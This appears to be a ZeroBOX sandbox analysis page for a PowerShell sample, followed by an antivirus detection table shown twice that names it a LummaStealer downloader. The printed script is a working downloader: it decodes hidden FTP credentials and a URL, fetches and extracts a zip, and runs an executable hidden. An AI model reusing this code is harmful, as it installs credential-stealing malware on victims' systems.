Static | ZeroBOX

$u = New-Object System.Net.WebClient

$u.Credentials = New-Object System.Net.NetworkCredential([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("QXN0cm9WaXNpb24=")), [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("VmUhMG1oMTY=")))

$g = "$env:TEMP\\ezip"

$r = "$env:TEMP\\a1ao.zip"

$o = "rdpinit.exe"

$n = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("ZnRwOi8vc2hhaWxlc2h2aXNpb25hcnlhc3Ryb2xvZ2VyLmNvbS9TY3JpcHRzL0p1bmN0aW9uLnppcA=="))

$u.DownloadFile($n, $r)

if (-Not (Test-Path -Path $g)) {

New-Item -ItemType Directory -Path $g | Out-Null

Add-Type -AssemblyName System.IO.Compression.FileSystem

[System.IO.Compression.ZipFile]::ExtractToDirectory($r, $g)

$p = Join-Path -Path $g -ChildPath $o

if (Test-Path -Path $p) {

Start-Process -FilePath $p -WindowStyle Hidden

} else {

Write-Error ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("RXhlY3V0YWJsZSBub3QgZm91bmQgaW4gZXh0cmFjdGVkIGZvbGRlci4=")))

Start-Sleep -Seconds 700

Remove-Item -Path $r -Force

Remove-Item -Path $g -Recurse -Force

Antivirus	Signature
Bkav	Clean
Lionic	Trojan.Script.PowerShell.4!c
ClamAV	Clean
CTX	powershell.trojan.lummastealer
CAT-QuickHeal	Clean
Skyhigh	Clean
ALYac	Trojan.Agent.GNVQ
Malwarebytes	Clean
Zillya	Clean
CrowdStrike	Clean
K7GW	Clean
K7AntiVirus	Clean
huorong	Trojan/Generic!B10ECCEC160C1D8B
Baidu	Clean
VirIT	Clean
Symantec	Trojan.Gen.MBT
ESET-NOD32	PowerShell/TrojanDownloader.Agent.KTB
TrendMicro-HouseCall	Clean
Avast	Script:SNH-gen [Trj]
Cynet	Clean
Kaspersky	Clean
BitDefender	Trojan.Agent.GNVQ
NANO-Antivirus	Clean
ViRobot	Clean
MicroWorld-eScan	Trojan.Agent.GNVQ
Tencent	Win32.Trojan-Downloader.Downloader.Fwnw
Sophos	Clean
F-Secure	Clean
DrWeb	PowerShell.DownLoader.2269
VIPRE	Trojan.Agent.GNVQ
TrendMicro	Clean
CMC	Clean
Emsisoft	Trojan.Agent.GNVQ (B)
Ikarus	Trojan-Downloader.PowerShell.Agent
FireEye	Trojan.Agent.GNVQ
Jiangmin	Clean
Varist	ABTrojan.VQQZ-
Avira	Clean
Fortinet	Clean
Antiy-AVL	Clean
Kingsoft	Win32.Troj.Undef.a
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Trojan.Agent.GNVQ
SUPERAntiSpyware	Clean
Microsoft	Trojan:PowerShell/LummaStealer.DRS!MTB
Google	Detected
AhnLab-V3	Downloader/Powershell.LummaC2.SC227430
Acronis	Clean
McAfee	Clean
TACHYON	Clean
VBA32	Clean
Zoner	Clean
Rising	Clean
Yandex	Clean
SentinelOne	Clean
MaxSecure	Clean
GData	Trojan.Agent.GNVQ
AVG	Script:SNH-gen [Trj]
Panda	Clean
alibabacloud	Clean

Antivirus

Signature

Bkav

Clean

Lionic

Trojan.Script.PowerShell.4!c

ClamAV

Clean

CTX

powershell.trojan.lummastealer

CAT-QuickHeal

Clean

Skyhigh

Clean

ALYac

Trojan.Agent.GNVQ

Malwarebytes

Clean

Zillya

Clean

CrowdStrike

Clean

K7GW

Clean

K7AntiVirus

Clean

huorong

Trojan/Generic!B10ECCEC160C1D8B

Baidu

Clean

VirIT

Clean

Symantec

Trojan.Gen.MBT

ESET-NOD32

PowerShell/TrojanDownloader.Agent.KTB

TrendMicro-HouseCall

Clean

Avast

Script:SNH-gen [Trj]

Cynet

Clean

Kaspersky

Clean

BitDefender

Trojan.Agent.GNVQ

NANO-Antivirus

Clean

ViRobot

Clean

MicroWorld-eScan

Trojan.Agent.GNVQ

Tencent

Win32.Trojan-Downloader.Downloader.Fwnw

Sophos

Clean

F-Secure

Clean

DrWeb

PowerShell.DownLoader.2269

VIPRE

Trojan.Agent.GNVQ

TrendMicro

Clean

CMC

Clean

Emsisoft

Trojan.Agent.GNVQ (B)

Ikarus

Trojan-Downloader.PowerShell.Agent

FireEye

Trojan.Agent.GNVQ

Jiangmin

Clean

Varist

ABTrojan.VQQZ-

Avira

Clean

Fortinet

Clean

Antiy-AVL

Clean

Kingsoft

Win32.Troj.Undef.a

Gridinsoft

Clean

Xcitium

Clean

Arcabit

Trojan.Agent.GNVQ

SUPERAntiSpyware

Clean

Microsoft

Trojan:PowerShell/LummaStealer.DRS!MTB

Google

Detected

AhnLab-V3

Downloader/Powershell.LummaC2.SC227430

Acronis

Clean

McAfee

Clean

TACHYON

Clean

VBA32

Clean

Zoner

Clean

Rising

Clean

Yandex

Clean

SentinelOne

Clean

MaxSecure

Clean

GData

Trojan.Agent.GNVQ

AVG

Script:SNH-gen [Trj]

Panda

Clean

alibabacloud

Clean